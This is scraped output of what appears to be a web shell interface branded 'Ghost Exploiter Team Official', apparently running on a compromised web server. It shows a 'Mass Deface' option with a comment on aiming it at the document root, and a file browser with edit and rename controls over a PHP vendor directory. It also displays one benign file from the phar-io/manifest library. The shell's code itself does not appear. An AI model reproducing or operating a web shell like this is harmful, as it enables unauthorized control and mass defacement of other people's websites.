Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phar-io
/
manifest
/
src
/
xml
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AuthorElement.php
0.713KB
edt
ren
AuthorElementCollection
...
0.581KB
edt
ren
BundlesElement.php
0.619KB
edt
ren
ComponentElement.php
0.631KB
edt
ren
ComponentElementCollect
...
0.59KB
edt
ren
ContainsElement.php
0.884KB
edt
ren
CopyrightElement.php
0.762KB
edt
ren
ElementCollection.php
1.698KB
edt
ren
ExtElement.php
0.525KB
edt
ren
ExtElementCollection.php
0.572KB
edt
ren
ExtensionElement.php
0.635KB
edt
ren
LicenseElement.php
0.621KB
edt
ren
ManifestDocument.php
3.262KB
edt
ren
ManifestElement.php
2.107KB
edt
ren
PhpElement.php
0.78KB
edt
ren
RequiresElement.php
0.573KB
edt
ren
<?php declare(strict_types = 1); /* * This file is part of PharIo\Manifest. * * Copyright (c) Arne Blankerts <arne@blankerts.de>, Sebastian Heuer <sebastian@phpeople.de>, Sebastian Bergmann <sebastian@phpunit.de> and contributors * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * */ namespace PharIo\Manifest; class ExtElementCollection extends ElementCollection { public function current(): ExtElement { return new ExtElement( $this->getCurrentElement() ); } }